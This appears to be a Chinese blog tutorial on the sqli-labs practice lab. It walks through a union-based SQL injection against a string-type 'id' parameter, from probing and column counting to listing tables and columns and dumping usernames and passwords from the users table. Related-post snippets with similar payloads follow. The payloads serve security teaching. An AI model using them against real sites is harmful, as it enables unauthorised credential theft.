Error Based-String--SQL注入

原创已于 2025-07-09 23:03:51 修改 · 271 阅读

7 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库

于 2025-07-09 20:07:46 首次发布

1、首先判断是什么型注入

?id=1 and 1=1 --+ //页面显示正常
?id=1 and 1=2 --+ //页面显示正常，因此是不是数字型注入

?id=1’ and 1=2 --+ //页面显示不正常
?id=1’ and 1=1 --+ //页面显示正常，因此是字符型注入

2、判断数据表的列数

?id=1' order by 4--+ //页面显示不正常，说明少于4列

?id=1' order by 3--+ //页面正常，说明存在3列

3、判断数据库名

由于页面只能显示一行数据，因此我们需要输入

?id=-1' union select select 1,2,3--+

我们可以看出2，3都可以显示在页面，因此我们使用database()数据库函数就可以查处当前使用的数据库的名字--security。

?id=-1' union select select 1,database(),3--+

4、判断数据库所有表的名字

因为页面只能显示一条数据，因此我们需要使用group_concat()聚合函数将要查询的结果显示成一条结果。

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、判断数据库某个表的所有字段的名字

例如：users表

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

我们可以得到三个字段：id，username，password

6、判断表里的所有数据

?id=-1' union select 1,group_concat(id,'~',username,'~',password),3  from users--+

由于字段之间没有分隔符，分不清哪个值是哪个字段的数据，因此我们加上分隔符。

以上就是SQL注入的所有流程了。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

曹莓可爱多

关注关注

4
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

luosaierdadi的博客

07-09

336

模拟真实环境，我们作为Dump用户使用Dump密码登陆，可以看到以下登陆成功此时打开hackbar选中post可以看到，已经自动载入的刚才提交的表单数据：我刚测试了一下，hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时，无论and后面是1=1还是1=2，都能登陆，不知道为什么，可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit，抓包修改参数。输入admin admin 登陆，抓包，发送到re

GET-ERROR based-Single quotes – String （GET型基于错误的单引号字符型注入） Less-1

water0diamond的博客

03-12

1012

关于数据库的一些基础，会在前一篇提前准备篇中提到首先打开网站首页，会发现如下界面：显示请输入id作为带数值的参数，那么下一步，我们就可以将参数传入试着提交然后看会有什么返回值。使用get方式提交id参数，这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。然后再测id类型是否为字符串，用单引号测试，出现‘’’说明id为字符串类型那么下面我们试着添加...

参与评论您还未登录，请先登录后发表或查看评论

Sqli-labs Less-3 Error Based- String (with Twist)

秀

04-15

397

首先还是看网页提示输入id测试，输入id后加单引号看有什么输出。 payload /sql/Less-3/?id=1' 可以看到报错，报错在1后面有一个括号，换一个payload试一下。 payload /sql/Less-3/?id=1') --+ 可以看到可以正常显示内容。接下来确定回显位置。 /sql/Less-3/?id=-1') union select 1,2,3--+ 可以看到回显位置为2和3的位置，这里要注意id要设置为-1才能够看到回显位置，因为id为-1

sql-labs SQL注入平台-第4关Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

Onlyone_1314的博客

09-03

462

Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）发现我们输入的id值被括号(“”)包围起来了，这样导致我们输入的值都会被当作括号里的id，且两边被双引号包围。其他的步骤就和第3关类似了。成功使用union联合查询。

sql-labs SQL注入平台-第1关Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

Onlyone_1314的博客

07-25

1579

记得把php.in中的转义参数magic_quotes_gpc配置成Off不然发送的请求参数中的符号会被加上\转义，从而无法直接拼接到SQL语句中去。

【SQL注入攻击】GET-Error based-Double quotes-String（基于错误的GET双引号字符型注入）

sm1918451478的博客

10-23

355

【QSL注入攻击】Double quotes（基于错误的GET双引号字符型注入）

sqli-lab笔记--less01 （Error Based- String）

TYW168168的博客

10-17

537

　　　　　　sqli-lab less01--Error Based- String(基于字符串错误) 　（第1节：基于错误 – 字符串）　　字符型注入，也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住　　TEST 　　http://127.0.0.1/sqli/Less-1/?id=1' 　　提示语法错误：　　　　　　　　　...

sqli-labs全通关（1-75）之Less-1 GET - Error based - Single quotes - String

guanrongl的专栏

08-05

584

3、用 and ‘1’='1 和 and ‘1’='2来判断，1’ and ‘1’ = '1,页面运行正常，而1’ and ‘1’ = '2,页面运行错误，则说明此 Sql 注入为字符型注入。2、用 and 1=1 和 and 1=2 来判断，两者都能正常回显则是字符型注入，否则是数字型注入。1、用减法判断：利用id=2-1 如果返回的是id=1的结果，则是数字注入，否则是字符注入。id=1’ order by 3 --+ // --+ 是注释。当 id=2-1，得到结果为Angelina ，

sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

luosaierdadi的博客

06-28

540

输入单引号，页面报错，如下图所示根据报错信息，可以确定输入参数的内容被存放到一对单引号中间，猜想：咱们输入的1在数据库中出现的位置为：select ... from ... where id=’1’ ......，也可以查看sqli-lab中less-1的php文件可以看到，和猜想一致，多余的步骤不多说了，直接开始爆数据吧。注意 id=非正确值爆库payload?id=-1' union select 1,2,database() --+得到‘security’库名爆表payload?id=-1' unio

sqli-labs全通关（1-75）之Less-4 GET - Error based - Double Quotes - String

guanrongl的专栏

08-12

294

Less-4 GET - Error based - Double Quotes - String

【SQLi-Labs】Less-1 Error based - Single quotes - String

xw1995115的博客

11-12

1075

第一课：基于报错的以单引号包裹的字符型注入 1. 根据黄字提示，传入参数ID http://10.1.2.210:8000/Less-1/?id=1 执行结果如下 2.根据题目提示，注入点基于报错，由单引号包裹，并且是字符型注入，判断源码大概为： select * from users where id = '$_GET['id']'; 3.构造查询找到回显数量及位置 ?id=1' order by 1 --+ ?id=1' order by 2 --+ ?id=1' ord..

提高 SQL Server 并发性能与可靠性、保障数据准确性的系统性方法

nbsaas-boot基于Request-Response的企业级快速开发框架

10-11

200

本文系统探讨了SQLServer在高并发场景下的性能优化与可靠性保障策略。在并发性能方面，建议采用行版本控制（RCSI/SNAPSHOT）替代传统锁机制，通过批处理、锁粒度优化和异步解耦提升吞吐量。可靠性方面强调事务日志管理、FULL恢复模式配合AlwaysOn高可用方案。数据准确性需合理选择隔离级别，实施乐观锁控制。架构层面推荐读写分离、分库分表与缓存设计。监控环节需关注锁等待、I/O和tempdb使用情况。综合优化应平衡锁设计、事务粒度和IO架构，通过版本控制、异步处理和读写分离实现性能与可靠性的动态平

MySQLEXPLAIN命令详解从执行计划看SQL性能优化

Kuriyama的博客

10-10

356

EXPLAIN是MySQL的一个关键字，用于显示MySQL如何执行一条SELECT语句。通过在SELECT语句前加上EXPLAIN关键字，MySQL不会真正执行该查询，而是返回其执行计划的详细信息。这个计划描述了MySQL优化器打算如何访问表、使用哪些索引、表之间的连接方式以及预计需要扫描的行数等关键信息。MySQL的EXPLAIN命令是SQL性能调优不可或缺的利器。

PostgreSQL + Redis + Elasticsearch 实时同步方案实践：从触发器到高性能搜索

四楼没电梯的专栏

10-09

657

本文提出一种轻量级实时数据同步方案，通过PostgreSQL触发器+LISTEN/NOTIFY机制实现主数据库与Redis缓存、Elasticsearch索引的实时同步。该方案采用异步Worker监听数据库变更事件，相比定时扫描方案延迟更低（秒级），相比Kafka等方案实现更简单。文中详细介绍了触发函数创建、Worker实现代码及可靠性优化措施，并对比了不同方案的优劣势，指出该方案特别适合中小型系统在保证实时性的同时降低复杂度。

sql题目练习——多表查询

qq_39965785的博客

10-09

772

现有 orders 表，字段有 order_id（订单编号，主键），customer_id（客户编号），order_date（订单日期）；以及 customers 表，字段有 customer_id（客户编号，主键），customer_name（客户姓名），city（客户所在城市）。编写 SQL 查询所有来自 “Beijing” 城市的客户的订单编号、订单日期和客户姓名。

使用DuckDB SQL求三阶六角幻方

l1t的专栏

10-09

182

这篇文章探讨了六角幻方的构造方法。作者使用SQL递归查询，通过枚举1到19的数字组合，寻找满足特定条件的排列：最外圈三个相邻数之和相等(38)，对角线上五个数之和相等，以及间隔边的中点连线四个数之和相等。通过构建三元组和循环排列，最终找出12种对称解，这些解本质上是同一基本解的不同旋转和镜像。该方法巧妙地将数学问题转化为数据库查询，展现了组合数学与计算机算法的结合应用。

手写MyBatis第95弹：调试追踪MyBatis SQL执行流程的终极指南

源码获取 | 运行部署 | 定制二开修改，如果回复不及时请耐心等待，请见谅。

10-06

913

本文是一篇关于使用IDEA深度调试MyBatis SQL执行流程的实用指南。文章系统性地介绍了从基础断点设置到高级调试技巧的全套方法，包括：三种核心断点类型：行断点、条件断点和表达式评估的具体应用场景 MyBatis SQL执行全流程的调试策略，重点分析代理层和执行器层的关键断点设置高级调试技巧：多线程环境调试、动态SQL生成分析和性能问题定位三个典型问题的实战调试案例解析调试最佳实践和思维培养建议文章强调调试不仅是解决问题的工具，更是深入理解框架运行机制的途径。通过掌握这些调试技巧，开发者可以提

PostgreSQL的数据集成之路：ETL+CDC实现实时多源聚合

RestCloud的博客

10-10

273

ETLCloud通过"ETL+CDC"实现多源数据实时聚合，推动PostgreSQL成为企业实时数据枢纽，兼具通用性与高效性。

2025 年 9 月《大模型 SQL 能力排行榜》发布，新增 Kimi K2 最新版测评！